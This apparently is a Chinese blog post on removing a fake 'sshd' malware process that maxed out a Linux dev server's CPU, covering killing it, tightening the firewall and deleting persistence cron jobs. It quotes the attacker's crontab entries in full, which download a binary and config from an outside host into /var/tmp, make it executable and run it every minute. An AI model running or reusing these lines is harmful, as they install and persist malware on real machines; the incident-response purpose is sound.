-
现象
top 命令, 发现有sshd恶意程序运行, 导致CPU占用100%
image.png
- 排查过程
2.1 找到该恶意程序的绝对路径
ll /proc/{pid}
image.png
查看恶意程序路径文件:
image.png
2.2 kill进程, 删除恶意程序
rm -rf /var/tmp/*
kill -9 {pid}
2.3 加强防火墙
控制访问该linux的来源IP, 因为是开发用的机器, 只要配置公司和家里的外网出口IP即可.
image.png
2.4 删除恶意的linux定时任务
做完 2.1, 2.2, 2.3 后, 恶意程序过一段时间后, 还是会重新下载到/var/tmp目录, 并运行.
发现有恶意的linux定时任务存在, 删除即可!
[root@izbp12nolsc59kg932hp97z tmp]# crontab -l
0 * * * * python3 /vgc_data_lake/monitor/lakemon/python/data_status/etl.py
0 */6 * * * /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://main.cloudfronts.net/dns/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://main.cloudfronts.net/dns/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://main.cloudfronts.net/dns/config.json; cd /var/tmp; curl http://main.cloudfronts.net/dns/config.json -o config.json'
* * * * * /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'
删除定时任务:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
0 */6 * * * root /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://main.cloudfronts.net/dns/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://main.cloudfronts.net/dns/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://main.cloudfronts.net/dns/config.json; cd /var/tmp; curl http://main.cloudfronts.net/dns/config.json -o config.json'
* * * * * root /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'
网友评论